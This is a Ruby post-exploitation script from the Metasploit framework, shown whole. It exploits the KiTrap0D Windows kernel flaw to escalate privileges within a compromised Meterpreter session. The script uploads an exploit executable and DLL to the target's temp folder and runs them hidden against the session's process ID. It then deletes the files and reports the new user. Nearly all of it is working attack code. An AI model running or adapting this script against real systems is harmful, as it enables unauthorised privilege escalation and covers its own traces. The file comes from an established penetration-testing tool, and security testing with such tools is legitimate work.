metasploit-framework/scripts/meterpreter/kitrap0d.rb

100 lines
2.3 KiB
Ruby

# $Id$
#
# Meterpreter script for exploiting the KiTrap0D flaw
# using Tavis Ormandy's PoC
#
session = client
#
# Options
#
opts = Rex::Parser::Arguments.new(
"-h" => [ false, "This help menu"]
)
#
# Option parsing
#
opts.parse(args) do |opt, idx, val|
case opt
when "-h"
print_line(opts.usage)
raise Rex::Script::Completed
end
end
# Exec a command and return the results
def m_exec(session, cmd)
r = session.sys.process.execute(cmd, nil, {'Hidden' => true, 'Channelized' => true})
b = ""
while(d = r.channel.read)
b << d
end
r.channel.close
r.close
b
end
if client.platform =~ /win32|win64/
# Handle exceptions in the getuid() call
begin
print_status("Currently running as " + client.sys.config.getuid)
print_line("")
rescue ::Rex::Post::Meterpreter::RequestError
end
print_status("Loading the vdmallowed executable and DLL from the local system...")
based = ::File.join(Msf::Config.install_root, "data", "exploits", "kitrap0d")
exp = ::File.join(based, "vdmallowed.exe")
dll = ::File.join(based, "vdmexploit.dll")
expdata = ""
::File.open(exp, "rb") do |fd|
expdata = fd.read(fd.stat.size)
end
dlldata = ""
::File.open(dll, "rb") do |fd|
dlldata = fd.read(fd.stat.size)
end
tempdir = client.fs.file.expand_path("%TEMP%")
tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
print_status("Uploading vdmallowed to #{tempexe}...")
fd = client.fs.file.new(tempexe, "wb")
fd.write(expdata)
fd.close
tempdir = client.fs.file.expand_path("%TEMP%")
tempdll = tempdir + "\\" + "vdmexploit.dll"
print_status("Uploading vdmallowed to #{tempdll}...")
fd = client.fs.file.new(tempdll, "wb")
fd.write(dlldata)
fd.close
server = client.sys.process.open
print_status("Escalating our process (PID:#{server.pid})...")
print_line("")
tempdrive = tempdir.split(':')[0]
data = m_exec(client, "cmd.exe /c #{tempdrive}: & cd \"#{tempdir}\" & #{tempexe} #{server.pid}")
print_line(data)
print_status("Deleting files...")
client.fs.file.rm(tempexe)
client.fs.file.rm(tempdll)
# Handle exceptions in the getuid() call
begin
print_status("Now running as " + client.sys.config.getuid)
rescue ::Rex::Post::Meterpreter::RequestError
end
else
print_error("This version of Meterpreter is not supported with this Script!")
raise Rex::Script::Completed
end